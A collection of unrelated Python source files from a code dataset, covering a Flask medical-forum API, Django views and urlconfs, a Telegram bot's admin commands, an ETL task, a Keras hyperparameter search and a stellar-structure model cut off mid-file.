is obtained from the column diagnoses.user_id\r\n \"\"\"\r\n\r\n diagnoses_db = g.con.get_diagnoses(message_id=message_id)\r\n envelope = forum_obj.ForumObject()\r\n envelope.add_namespace(\"medical_forum\", hyper_const.LINK_RELATIONS_URL)\r\n\r\n envelope.add_control(\"self\", href=API.url_for(Diagnoses))\r\n envelope.add_control_users_all()\r\n envelope.add_control_add_diagnosis()\r\n items = envelope[\"items\"] = []\r\n\r\n for dgs in diagnoses_db:\r\n item = forum_obj.ForumObject(\r\n id=dgs[\"diagnosis_id\"], disease=dgs[\"disease\"])\r\n item.add_control(\"self\", href=API.url_for(\r\n Diagnosis, diagnosis_id=dgs[\"diagnosis_id\"]))\r\n item.add_control(\r\n \"profile\", href=hyper_const.FORUM_DIAGNOSIS_PROFILE)\r\n items.append(item)\r\n\r\n return Response(json.dumps(envelope), 200, mimetype=hyper_const.MASON + \";\" +\r\n hyper_const.FORUM_DIAGNOSIS_PROFILE)\r\n\r\n\r\nclass Diagnosis(Resource):\r\n \"\"\"\r\n Resource that represents a single diagnosis in the API.\r\n \"\"\"\r\n\r\n def get(self, diagnosis_id):\r\n \"\"\"\r\n Get the disease, the diagnosis and the id of a specific diagnosis and its message id.\r\n\r\n Returns status code 404 if the diagnosis_id does not exist in the database.\r\n\r\n INPUT PARAMETER\r\n : param str diagnosis_id: The id of the diagnosis to be retrieved from the\r\n system\r\n\r\n RESPONSE ENTITY BODY:\r\n * Media type: application/vnd.mason+json:\r\n https://github.com/JornWildt/Mason\r\n * Profile: Forum_Diagnosis\r\n /profiles/diagnosis-profile\r\n\r\n Link relations used: self, collection, user_id,\r\n # NOTE, and reply?\r\n\r\n Semantic descriptors used: diagnosis, disease\r\n return None.\r\n\r\n RESPONSE STATUS CODE\r\n * Return status code 200 if everything OK.\r\n * Return status code 404 if the diagnosis was not found in the database.\r\n\r\n NOTE:\r\n * The attribute disease is obtained from the column diagnoses.disease\r\n * The attribute diagnosis is obtained from the column diagnoses.diagnosis_description\r\n * The attribute message_id is obtained from the column diagnoses.message_id\r\n * The attribute user_id is obtained from the column diagnoses.user_id\r\n \"\"\"\r\n\r\n diagnosis_db = g.con.get_diagnosis(diagnosis_id)\r\n if not diagnosis_db:\r\n abort(404, diagnosis=\"There is no a diagnosis with id %s\" % diagnosis_id,\r\n resource_type=\"Diagnosis\",\r\n resource_url=request.path,\r\n resource_id=diagnosis_id)\r\n\r\n user_id = diagnosis_db.get(\"user_id\")\r\n message_id = diagnosis_db.get(\"message_id\")\r\n\r\n envelope = forum_obj.ForumObject(\r\n disease=diagnosis_db[\"disease\"],\r\n diagnosis_description=diagnosis_db[\"diagnosis_description\"],\r\n user_id=user_id,\r\n message_id=message_id\r\n )\r\n\r\n envelope.add_namespace(\"medical_forum\", hyper_const.LINK_RELATIONS_URL)\r\n envelope.add_namespace(\"atom-thread\", hyper_const.ATOM_THREAD_PROFILE)\r\n\r\n envelope.add_control_reply_to(diagnosis_id)\r\n envelope.add_control(\r\n \"profile\", href=hyper_const.FORUM_DIAGNOSIS_PROFILE)\r\n envelope.add_control(\"collection\", href=API.url_for(Diagnoses))\r\n envelope.add_control(\"self\", href=API.url_for(\r\n Diagnosis, diagnosis_id=diagnosis_id))\r\n envelope.add_control(\r\n \"user_id\", href=API.url_for(user_res.User, username=user_id))\r\n\r\n envelope.add_control(\"atom-thread:in-reply-to\", href=None)\r\n return Response(json.dumps(envelope), 200, mimetype=hyper_const.MASON + \";\" +\r\n hyper_const.FORUM_DIAGNOSIS_PROFILE)\r\n\r\n def put(self, diagnosis_id):\r\n \"\"\"\r\n Modifies the disease and description 
of the diagnosis.\r\n \"\"\"\r\n\r\n if not g.con.contains_diagnosis(diagnosis_id):\r\n return create_error_response(404, \"Diagnosis not found\",\r\n \"There is no diagnosis with id %s\" % diagnosis_id)\r\n\r\n if hyper_const.JSON != request.headers.get(\"Content-Type\", \"\"):\r\n return create_error_response(415, \"UnsupportedMediaType\",\r\n \"Use a JSON compatible format\")\r\n request_body = request.get_json(force=True)\r\n\r\n try:\r\n disease = request_body[\"disease\"]\r\n diagnosis_description = request_body[\"diagnosis_description\"]\r\n\r\n except KeyError:\r\n return create_error_response(400, \"Wrong request format\",\r\n \"Be sure you include disease and diagnosis_description\")\r\n else:\r\n if not g.con.modify_diagnosis(diagnosis_id, disease, diagnosis_description):\r\n return create_error_response(\r\n 500, \"Internal error\", \"Diagnosis information for %s cannot be updated\"\r\n % diagnosis_id)\r\n return \"\", 204\r\n","sub_path":"medical_forum/diagnosis_resources.py","file_name":"diagnosis_resources.py","file_ext":"py","file_size_in_byte":12582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"599298764","text":"from django.contrib.auth import logout, authenticate, login\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom django.http import HttpResponse\nfrom .models import BookList\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib import messages\n\ndef start_page(request):\n return render(\n request,\n 'books/start_page.html',\n {}\n\n )\n\ndef all_books(request):\n lists = BookList.objects.all()\n return render(\n request,\n 'books/all_books.html',\n {'all_books': lists}\n )\n\n\n\ndef register(request):\n if request.method == \"POST\":\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n username = form.cleaned_data.get('username')\n messages.success(request, f\"New account created {username}\")\n login(request, user)\n return redirect(start_page)\n else:\n for msg in form.error_messages:\n print(form.error_messages[msg])\n\n return render(request=request,\n template_name=\"main/register.html\",\n context={\"form\": form})\n\n form = UserCreationForm\n return render(request = request,\n template_name = \"books/register.html\",\n context={\"form\": form})\n","sub_path":"mysite/books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"337240170","text":"from kawaiibot.bot import kawaiibot\nimport logging\n\nadmin_usernames = ['stevenyo', 'NULLSPHERE']\n\n@kawaiibot.command('disabled')\ndef disabled(args):\n disabled = [func.__name__ for func in kawaiibot.disabled]\n return ', '.join(disabled) if disabled else 'Nothing is disabled'\n\n@kawaiibot.command('disable')\ndef disable(args):\n n = []\n if args.message.from_user.username not in admin_usernames:\n return 'You can\\'t do that'\n\n for s in args.message.text.split(' ')[1::]:\n command = kawaiibot.get_command(s)\n if command not in kawaiibot.disabled:\n n.append(s)\n kawaiibot.disabled.append(command)\n logging.info('Command \\'{}\\' disabled by {}'.format(s, args.message.from_user.username))\n if len(n) > 0:\n return 'Disabled: {}'.format(', '.join(n))\n else:\n return 'Did nothing. 
Command already disabled.'\n\n@kawaiibot.command('enable')\ndef enable(args):\n n = []\n if args.message.from_user.username not in admin_usernames:\n return 'You can\\'t do that'\n\n for s in args.message.text.split(' ')[1::]:\n command = kawaiibot.get_command(s)\n if command in kawaiibot.disabled:\n n.append(command.__name__)\n kawaiibot.disabled.remove(command)\n logging.info('Command \\'{}\\' enabled by {}'.format(s, args.message.from_user.username))\n if len(n) > 0:\n return 'Enabled: {}'.format(', '.join(n))\n else:\n return 'Did nothing. Command already enabled.'\n\n\n","sub_path":"kawaiibot/commands/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"314132158","text":"import math\nimport scipy.special as sp\n\nN = 100\n\ndef b(n, p, k):\n return sp.comb(n, k) * math.pow(p, k) * math.pow((1-p), n-k)\n\ndef get_zscore(x, p):\n mean = N*p\n sigma = math.sqrt(N*p*(1-p))\n return (x-mean)/sigma\n \ndef p_greater(xlower, p):\n alpha = 0.0\n for i in range(xlower, N):\n alpha += b(N, p, i)\n return alpha\n\nif __name__ == \"__main__\":\n i = 0\n alpha, beta = 0, 0\n for i in range(N):\n alpha = 0.0\n for j in range(i, N):\n alpha += b(N, 0.5, j)\n if alpha < 0.05:\n print(f\"m: {i} for alpha\")\n break\n i = N\n for i in range(N, 0, -1):\n alpha = 0.0\n for j in range(i, N):\n alpha += b(N, 0.7, j)\n if 1-alpha < 0.05:\n print(f\"beta: {1-alpha}, i: {i}\")\n break\n \n\n \n \n \n \n \n \n \n \n \n\n ","sub_path":"Randomness/Programming Assignments/venken.py","file_name":"venken.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"52870964","text":"\"\"\"This urlconf sets the directions for the timed_mating app.\n\nIt comprises create, update, delete, detail and list views for plug events.\"\"\"\n\nfrom django.conf.urls.defaults import *\nfrom django.views.generic.list_detail import object_list, object_detail\nfrom django.views.generic.create_update import create_object, update_object, delete_object\nfrom django.contrib.auth.decorators import login_required, permission_required\n\nfrom mousedb.timed_mating.models import PlugEvents\n\n@login_required\ndef limited_object_list(*args, **kwargs):\n\treturn object_list(*args, **kwargs)\n\n@login_required\ndef limited_object_detail(*args, **kwargs):\n\treturn object_detail(*args, **kwargs)\n\n@permission_required('timed_mating.add_plugevents')\ndef create_plugevents(*args, **kwargs):\n\treturn create_object(*args, **kwargs)\n\n@permission_required('timed_mating.change_plugevents')\ndef change_plugevents(*args, **kwargs):\n\treturn update_object(*args, **kwargs)\n\n@permission_required('timed_mating.delete_plugevents')\ndef delete_plugevents(*args, **kwargs):\n\treturn delete_object(*args, **kwargs)\n\nurlpatterns = patterns('',\n\turl(r'^$', limited_object_list, {\n\t\t'queryset': PlugEvents.objects.all(),\n\t\t'template_name': 'plug_list.html',\n\t\t'template_object_name': 'plug',\n\t\t}, name=\"plugevents-list\"),\n\turl(r'^(?P<object_id>\\d*)/$', limited_object_detail, {\n\t\t'queryset': PlugEvents.objects.all(),\n\t\t'template_name': 'plug_detail.html',\n\t\t'template_object_name': 'plug',\n\t\t}, name=\"plugevents-detail\"),\n\turl(r'^new/$', create_plugevents, {\n\t\t'model': PlugEvents, \n\t\t'template_name': 'plug_form.html', \n\t\t'login_required':True,\n\t\t'post_save_redirect':'/mousedb/plug_events/'\n\t\t}, 
name=\"plugevents-new\"),\n\turl(r'^(?P\\d*)/edit/$', change_plugevents, {\n\t\t'model': PlugEvents, \n\t\t'template_name': 'plug_form.html', \n\t\t'login_required':True,\n\t\t'post_save_redirect':'/mousedb/plug_events/'\n\t\t}, name=\"plugevents-edit\"),\n\turl(r'^(?P\\d*)/delete/$', delete_plugevents, {\n\t\t'model': PlugEvents, \n\t\t'login_required':True,\n\t\t'post_delete_redirect':'/mousedb/plug_events/',\n\t\t'template_name':'confirm_delete.html'\n\t\t}, name=\"plugevents-delete\"),\n\turl(r'^breeding/(?P\\d*)/new', 'mousedb.timed_mating.views.breeding_plugevent', name=\"breeding-plugevents-new\"),\n)\n","sub_path":"src/mousedb/timed_mating/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"392632393","text":"import torch\nimport os\n\nimport os\nimport torch\nimport argparse\nimport numpy as np\nfrom PIL import Image\nfrom tqdm import tqdm\n\nfrom torch.utils.data import DataLoader\nimport torchvision.transforms as transforms\n\nimport networks\nfrom utils.transforms import transform_logits\nfrom datasets.simple_extractor_dataset import SimpleFolderDataset\nimport torch.nn.functional as F\n\neps = 1e-5\ncheckpoints_path = '/home/qiu/Downloads/models/SCHP/'\nckpt_choice = {\n 'lip': 'exp-schp-201908261155-lip.pth',\n 'atr': 'exp-schp-201908301523-atr.pth',\n 'pascal': 'exp-schp-201908270938-pascal-person-part.pth'\n}\nchoices = ['lip', 'atr', 'pascal']\nity = choices[2]\ninputs = {\n 'lidingtiao': '/home/qiu/Projects/lidingtiao/full_cut/imgs/',\n 'run': './run/',\n 'err': './error/'\n}\ninputs_ch = ['lidingtiao', 'run', 'err']\ninputd = inputs_ch[2]\ndataset_settings = {\n 'lip': {\n 'input_size': [473, 473],\n 'num_classes': 20,\n 'label': ['Background', 'Hat', 'Hair', 'Glove', 'Sunglasses', 'Upper-clothes', 'Dress', 'Coat',\n 'Socks', 'Pants', 'Jumpsuits', 'Scarf', 'Skirt', 'Face', 'Left-arm', 'Right-arm',\n 'Left-leg', 'Right-leg', 'Left-shoe', 'Right-shoe']\n },\n 'atr': {\n 'input_size': [512, 512],\n 'num_classes': 18,\n 'label': ['Background', 'Hat', 'Hair', 'Sunglasses', 'Upper-clothes', 'Skirt', 'Pants', 'Dress', 'Belt',\n 'Left-shoe', 'Right-shoe', 'Face', 'Left-leg', 'Right-leg', 'Left-arm', 'Right-arm', 'Bag', 'Scarf']\n },\n 'pascal': {\n 'input_size': [512, 512],\n 'num_classes': 7,\n 'label': ['Background', 'Head', 'Torso', 'Upper Arms', 'Lower Arms', 'Upper Legs', 'Lower Legs'],\n }\n}\n\n\ndef get_arguments():\n \"\"\"Parse all the arguments provided from the CLI.\n Returns:\n A list of parsed arguments.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Self Correction for Human Parsing\")\n\n parser.add_argument(\"--dataset\", type=str, default=ity, choices=['lip', 'atr', 'pascal'])\n parser.add_argument(\"--model-restore\", type=str,\n default=os.path.join(checkpoints_path, ckpt_choice[ity]),\n help=\"restore pretrained model parameters.\")\n parser.add_argument(\"--gpu\", type=str, default='0', help=\"choose gpu device.\")\n parser.add_argument(\"--input-dir\", type=str, default=inputs[inputd],\n help=\"path of input image folder.\")\n parser.add_argument(\"--output-dir\", type=str, default='./output_' + inputd + '_' + ity,\n help=\"path of output image folder.\")\n parser.add_argument(\"--logits\", action='store_true', default=False, help=\"whether to save the logits.\")\n\n return parser.parse_args()\n\n\ndef main():\n args = get_arguments()\n\n gpus = [int(i) for i in args.gpu.split(',')]\n assert len(gpus) == 1\n if not 
args.gpu == 'None':\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu\n\n num_classes = dataset_settings[args.dataset]['num_classes']\n input_size = dataset_settings[args.dataset]['input_size']\n label = dataset_settings[args.dataset]['label']\n print(\"Evaluating total class number {} with {}\".format(num_classes, label))\n\n model = networks.init_model('resnet101', num_classes=num_classes, pretrained=None)\n\n state_dict = torch.load(os.path.join(checkpoints_path, ckpt_choice[ity]))['state_dict']\n from collections import OrderedDict\n new_state_dict = OrderedDict()\n for k, v in state_dict.items():\n k = k[7:]\n ss = k.split('.')\n if ss[-2].startswith('bn') and ss[-1].endswith('weight'):\n v1 = torch.abs(v) + eps\n else:\n v1 = v\n new_state_dict[k] = v1\n model.load_state_dict(new_state_dict)\n model.cuda()\n model.eval()\n torch.save(model.state_dict(), '/home/qiu/Projects/Self-Correction-Human-Parsing/deploy/'+ity+'_abn_checkpoint.pth')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"IABN2ABN.py","file_name":"IABN2ABN.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"79643835","text":"# flake8: noqa: E501\nfrom datetime import date, datetime\n\nfrom sqlalchemy.schema import Column\nfrom sqlalchemy.types import Date, DateTime, Integer, String\n\nfrom sqltask.classes import dq\nfrom sqltask.classes.exceptions import TooFewRowsException\nfrom sqltask.classes.sql import LookupSource, SqlDataSource\nfrom sqltask.classes.table import DqTableContext\n\nfrom .base_task import BaseExampleTask\n\n\nclass FactCustomerTask(BaseExampleTask):\n def __init__(self, report_date: date):\n super().__init__(report_date=report_date)\n\n # Define the metadata for the main fact table\n self.add_table(DqTableContext(\n name=\"fact_customer\",\n engine_context=self.ENGINE_TARGET,\n columns=[\n Column(\"report_date\", Date, comment=\"Date of snapshot\", primary_key=True),\n Column(\"etl_timestamp\", DateTime, comment=\"Timestamp when row was created\", nullable=False),\n Column(\"customer_name\", String(10), comment=\"Unique customer identifier (name)\", primary_key=True),\n Column(\"birthdate\", Date, comment=\"Birthdate of customer if defined and in the past\", nullable=True),\n Column(\"age\", Integer, comment=\"Age of customer in years if birthdate defined\", nullable=True),\n Column(\"sector_code\", String(10), comment=\"Sector code of customer\", nullable=True),\n ],\n comment=\"The customer table\",\n timestamp_column_name=\"etl_timestamp\",\n batch_params={\"report_date\": report_date},\n dq_info_column_names=[\"etl_timestamp\"],\n ))\n\n # Define the main query used to populate the target table\n self.add_data_source(SqlDataSource(\n name=\"main\",\n sql=\"\"\"\nSELECT name,\n birthday\nFROM customers\nWHERE report_date = :report_date\n \"\"\",\n params={\"report_date\": report_date},\n engine_context=self.ENGINE_SOURCE,\n ))\n\n # Define a lookup source used for enriching the main source query\n self.add_lookup_source(LookupSource(\n name=\"sector_code\",\n sql=\"\"\"\nSELECT name,\n sector_code\nFROM sector_codes\nWHERE start_date <= :report_date\n AND end_date > :report_date\n \"\"\",\n params={\"report_date\": report_date},\n engine_context=self.ENGINE_SOURCE,\n ))\n\n def transform(self) -> None:\n report_date = self.batch_params[\"report_date\"]\n sector_code_lookup = self.get_lookup(\"sector_code\")\n for in_row in self.get_data_source(\"main\"):\n row = 
self.get_new_row(\"fact_customer\")\n\n # customer_name\n customer_name = in_row[\"name\"]\n row[\"customer_name\"] = customer_name\n\n # birthdate\n birthday = in_row[\"birthday\"]\n age = None\n try:\n birthdate = datetime.strptime(birthday, \"%Y-%m-%d\").date() if birthday else None\n age = None\n if birthdate is None:\n row.log_dq(\n column_name=\"birthdate\",\n source=dq.Source.SOURCE,\n priority=dq.Priority.MEDIUM,\n category=dq.Category.MISSING,\n message=\"Missing birthdate\",\n )\n elif birthdate > report_date:\n row.log_dq(\n column_name=\"birthdate\",\n source=dq.Source.SOURCE,\n priority=dq.Priority.HIGH,\n category=dq.Category.INCORRECT,\n message=f\"Birthdate in future: {birthday}\",\n )\n birthdate = None\n else:\n age = int((report_date - birthdate).days / 365.25)\n except ValueError:\n # parse error\n row.log_dq(\n column_name=\"birthdate\",\n source=dq.Source.SOURCE,\n priority=dq.Priority.HIGH,\n category=dq.Category.INCORRECT,\n message=f\"Cannot parse birthdate: {birthday}\"\n )\n birthdate = None\n row[\"birthdate\"] = birthdate\n\n # age\n if age is None:\n row.log_dq(\n column_name=\"age\",\n source=dq.Source.TRANSFORM,\n priority=dq.Priority.MEDIUM,\n category=dq.Category.MISSING,\n message=\"Age is undefined due to undefined birthdate\",\n )\n row[\"age\"] = age\n\n # sector_code\n sector_code = sector_code_lookup.get(customer_name)\n if sector_code is None:\n row.log_dq(\n column_name=\"sector_code\",\n source=dq.Source.SOURCE,\n priority=dq.Priority.LOW,\n category=dq.Category.MISSING,\n message=\"Sector code undefined in lookup table\"\n )\n row[\"sector_code\"] = sector_code\n\n # Finally add row to table output\n row.append()\n\n def validate(self):\n if len(self.get_table_context(\"fact_customer\").output_rows) < 2:\n raise TooFewRowsException(\"There should never be less than 2 rows\")\n","sub_path":"example/tasks/fact_customer_task.py","file_name":"fact_customer_task.py","file_ext":"py","file_size_in_byte":5369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"508103236","text":"# 107번을 카피해서 Activation을 넣고 튠하시오\n# LSTM -> Dense로 바꿀 것\n\nimport numpy as np\nfrom keras.datasets import mnist\nfrom keras.utils import np_utils\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Input, LSTM\nfrom keras.layers import Conv2D, Flatten\nfrom keras.layers import MaxPooling2D, Dropout\nfrom keras.optimizers import Adam, Adadelta, Adagrad\nfrom keras.optimizers import RMSprop, Nadam, SGD, Adamax\nfrom keras.wrappers.scikit_learn import KerasClassifier # 케라스를 사이킷런으로 감싼다. (사이킷런에서 쓸 수 있게)\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\nfrom keras.activations import relu, elu, softmax\n\n# 1. 데이터\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\nprint(x_train.shape) # (60000, 28, 28)\nprint(x_test.shape) # (10000, 28, 28)\nprint(y_train.shape) # (60000,)\nprint(y_test.shape) # (10000,)\n\nx_train = x_train.reshape(x_train.shape[0], 28*28) / 255 # 정규화(min_max)\nx_test = x_test.reshape(x_test.shape[0], 28*28) / 255 # 정규화(min_max)\nx_train = x_train.reshape(x_train.shape[0], 28*28) / 255 # 정규화(min_max)\nx_test = x_test.reshape(x_test.shape[0], 28*28) / 255 # 정규화(min_max)\nprint(x_train.shape) # (60000, 784)\nprint(x_test.shape) # (10000, 784)\n\ny_train = np_utils.to_categorical(y_train) # label이 0부터 시작함\ny_test = np_utils.to_categorical(y_test) # label이 0부터 시작함\nprint(y_train.shape) # (60000, 10)\nprint(y_test.shape) # (10000, 10)\n\n\n# 2. 
모델링\ndef build_model(drop, optimizer, learning_rate, activation): \n inputs = Input(shape = (784,), name = 'input')\n x = Dense(512, activation = activation, name = 'hidden1')(inputs)\n x = Dropout(drop)(x)\n x = Dense(256, activation = activation, name = 'hidden2')(x)\n x = Dropout(drop)(x)\n x = Dense(128, activation = activation, name = 'hidden3')(x)\n x = Dropout(drop)(x)\n outputs = Dense(10, activation = 'softmax', name = 'output')(x)\n\n opt = optimizer(lr = learning_rate) # optimizer와 learning_rate 엮어주기\n model = Model(inputs = inputs, outputs = outputs)\n\n model.compile(optimizer = opt, metrics = ['accuracy'],\n loss = 'categorical_crossentropy')\n return model\n\ndef create_hyperparameter():\n batches = [256, 128]\n optimizers = [Adam, Adadelta, Adamax, Nadam, RMSprop, Adagrad, SGD]\n activations = [relu, elu, softmax]\n dropout = np.linspace(0.1, 0.5, 5).tolist() # 0.1 ~ 0.5까지 5단위로\n learning_rate = [0.1, 0.05, 0.25, 0.001]\n return {'batch_size': batches,\n 'optimizer': optimizers,\n 'drop': dropout,\n 'activation': activations,\n 'learning_rate': learning_rate}\n\n# KerasClassifier 모델 구성하기\nmodel = KerasClassifier(build_fn = build_model, verbose = 1)\n\n# hyperparameters 변수 정의\nhyperparameters = create_hyperparameter()\n\nsearch = RandomizedSearchCV(estimator = model,\n param_distributions = hyperparameters, cv = 3)\n\n# 모델 훈련\nsearch.fit(x_train, y_train)\nscore = search.score(x_test, y_test)\nprint(search.best_params_) # {'optimizer': 'adadelta', 'drop': 0.2, 'batch_size': 20}\nprint(\"score : \", score) # 0.9661999940872192","sub_path":"keras/keras111_RS.py","file_name":"keras111_RS.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"356488506","text":"import sys as sys\nsys.path.append('/Users/bruker/Documents/UiO/Bachelor/Semester 6/AST3310/Project0')\nsys.path.append('/Users/bruker/Documents/UiO/Bachelor/Semester 6/AST3310/Project1')\n\n\"\"\"\nThe sys paths should be replaced with the directionary containing the file SanProject0.py, \nSanProject1.py, and Opacity.txt\n\n\"\"\"\n\nfrom SanProject1 import CoreModel\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass StarModel(CoreModel):\n\n\t\"\"\"\n\tClass that builds on the stellar core model class by including convection as a means of\n\tenergy transportation. 
This is done by including the definition such as temperature gradients\n\tand implementing a if statement to check for when the star is stable and unstable.\n\n\t\"\"\"\n\n\n\tdef __init__(self):\n\n\t\t#inheriting init from CoreModel\n\t\tCoreModel.__init__(self)\n\n\t\t#initial condition at the surface of the star\n\t\tself.L_s = self.L_sol\t\t\t\t\t\t\t\t\t\t#luminosity,\t\tJ/s or W\n\t\tself.R_s = self.R_sol\t\t\t\t\t\t\t\t\t\t#radius,\t\t\tm\n\t\tself.M_s = self.M_sol\t\t\t\t\t\t\t\t\t\t#mass,\t\t\t\tkg\n\t\tself.rho_s = 1.42e-7*self.avgrho_sol\t\t\t\t\t\t#density,\t\t\tkg/m^3\n\t\tself.T_s = 5770\t\t\t\t\t\t\t\t\t\t\t\t#temperature,\t\tK\n\n\t\t#Constants for ideal gas approximation\n\t\tself.del_ad = 2/5\t\t\t\t\t\t\t\t\t\t\t#adiabatic temperature gradient\n\t\tself.c_P = (5*self.k_B) / (2*self.mu_u*self.mu)\t\t\t\t#specific heat capacity\n\t\tself.alpha = 1\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\tself.delta = 1\n\n\n\n\n\t\"\"\"\n\tDefining some functions which will be used under calculations\n\n\t\"\"\"\n\n\tdef g(self, m, r):\n\n\t\t\"\"\"\n\t\tComputing the gravitational acceleration g.\n\n\t\t\"\"\"\n\n\t\treturn (self.G*m) / (r**2)\n\n\n\n\tdef H_p(self, T, m, r):\n\n\t\t\"\"\"\n\t\tComputing the height pressure scale.\n\n\t\t\"\"\"\n\n\t\treturn (self.k_B*T)/(self.g(m,r)*self.mu*self.mu_u)\n\n\n\n\tdef xi_Solver(self, T, rho, kappa, m, r, L):\n\n\t\t\"\"\"\n\t\tComputing xi = (del_star - del_parcel)^(1/2), in addition to defining some usefull quantities. \n\t\tThis is done by solving a cubic equation.\n\n\t\t\"\"\"\n\n\t\t#substitution used to shorten equations\n\t\tself.U = ((64*self.sigma*(T**3))/(3*rho**2 * self.c_P * kappa)) * np.sqrt(self.H_p(T,m,r) / self.g(m,r)*self.delta)\n\n\t\t#mixing length\n\t\tself.l_m = self.alpha*self.H_p(T,m,r)\n\n\t\t#substitution U/l_m\n\t\tself.A = (self.U/(self.l_m**2))\n\n\t\t#Geometrical constant, S/Qd = 2/r_p. This doesnt appear elsewhere in the code, but it used when computing the coeffs\n\t\tself.SQd = 4/self.l_m\n\n\t\t#coefficients for the third degree polynomial\n\t\tCoeffs = [1/self.A, 1, 4*self.A, -(self.del_Stable(m,kappa,L,rho,T,r) - self.del_ad)]\n\n\t\t#finding the the roots of the cubic equation\n\t\txi = np.roots(Coeffs)\n\n\t\tfor root in xi:\n\t\t\tif np.isreal(root):\n\n\t\t\t\t#return a real solution\n\t\t\t\treturn root.real\n\n\n\n\tdef del_Stable(self, m, kappa, L, rho, T, r):\n\n\t\t\"\"\"\n\t\tComputing the temprature gradient for when the star is in a stable state.\n\t\n\t\t\"\"\"\n\n\t\treturn (3/64) * ((kappa * self.H_p(T, m, r))/(np.pi * self.sigma)) * ((L*rho)/(T**4 *r**2))\n\n\n\n\tdef del_Star(self, T, rho, kappa, m, r, L):\n\n\t\t\"\"\"\t\n\t\tComputing the temperature gradient for the star.\n\n\t\t\"\"\"\n\n\t\t#calculating xi\n\t\txi = self.xi_Solver(T, rho, kappa, m, r, L)\n\n\t\treturn xi**2 + 4*self.A*xi + self.del_ad\n\n\n\n\tdef del_AD(self, P, T, rho):\n\n\t\t\"\"\"\n\t\tComputing the temperature gradient for an adiabatic star. 
Unnecessary as\n\t\tit is analytically found to be equal to 2/5 because of ideal gas, but might\n\t\tbe a good check to see if the star behaves like the ideal case (which it does).\n\n\t\t\"\"\"\n\n\t\treturn P*self.delta/(T*rho*self.c_P)\n\n\n\n\tdef dTdm_Conv(self, T, P, r, m, rho, kappa, L):\n\n\t\t\"\"\"\n\t\tComputing the new dTdm for when convection is to be considered.\n\n\t\t\"\"\"\n\t\t\n\t\treturn (T/P)*self.dPdm(r, m)*self.del_Star(T, rho, kappa, m, r, L)\n\n\n\n\tdef Vel_parcel(self, m, r, T ,rho, kappa, L):\n\n\t\t\"\"\"\n\t\tComputing the velocity of a parcel of gas moving up the star.\n\n\t\t\"\"\"\n\n\t\t#calculating xi\n\t\txi = self.xi_Solver(T, rho, kappa, m, r, L)\n\n\t\treturn np.sqrt((self.g(m,r)*self.delta*self.l_m**2)/(4*self.H_p(T,m,r)))*xi\n\n\n\n\tdef Flux_Rad(self, L, r):\n\n\t\t\"\"\"\n\t\tComputing the radiative flux for a non convective star.\n\n\t\t\"\"\"\n\n\t\treturn L / (4 * np.pi * r**2) \t\n\n\n\n\tdef Flux_Rad_Conv(self, T, kappa, rho, m, r, L):\n\n\t\t\"\"\"\n\t\tComputing the radiatve flux for a convective star.\n\n\t\t\"\"\"\n\t\t\n\t\treturn (16/3)*((self.sigma*(T**4))/(kappa*rho*self.H_p(T,m,r)))*self.del_Star(T,rho,kappa,m,r,L)\n\n\n\n\tdef Flux_Conv(self, rho, T, m, r, kappa, L):\n\n\t\t\"\"\"\n\t\tComputing the convective flux for a convective star.\n\n\t\t\"\"\"\n\n\t\t#calculating xi\n\t\txi = self.xi_Solver(T, rho, kappa, m, r, L)\n\n\t\treturn (rho*self.c_P*T*np.sqrt(self.g(m,r)*self.delta)*(self.l_m**2)*xi**3)/(4*self.H_p(T,m,r)**(3/2))\n\n\n\n\tdef dm_Var_conv(self, r, P, L, T, rho, kappa, m, dTdm, p):\n\n\t\t\"\"\"\n\t\tSubroutine that returns a variable steplength dm. This is implemented so that we can find \n\t\thow big the steplength can be without ruining our calculations.\n\n\t\t\"\"\"\n\n\t\tdm_r = p*r/self.drdm(rho,r)\t\t\t\t\t\t\t\t#dm for the variable radius\n\t\tdm_P = p*P/self.dPdm(r,m)\t\t\t\t\t\t\t\t#dm for the variable pressure\n\t\tdm_L = p*L/self.dLdm(rho,T)\t\t\t\t\t\t\t\t#dm for the variable luminosity\n\t\tdm_T = p*T/dTdm\t\t\t\t\t\t\t\t\t\t\t#dm for the variable temperature\n\n\t\tdm_list = [abs(dm_r), abs(dm_P), abs(dm_L), abs(dm_T)]\t#list of all dm_var values\n\t\tdm_Var = -np.min(dm_list)\n\n\t\t#returning the smallest value in the dm_list which is the dm to be used.\n\t\treturn dm_Var\t\t\t\t\n\n\n\n\tdef Var_Integration_Conv(self, n, r0, rho0, L0, T0, m0, kappa0, p):\n\n\t\t\"\"\"\n\t\tSubroutine that integrates the variables of interest in a convective star through\n\t\tEulers Method in addition to using variable steplength. 
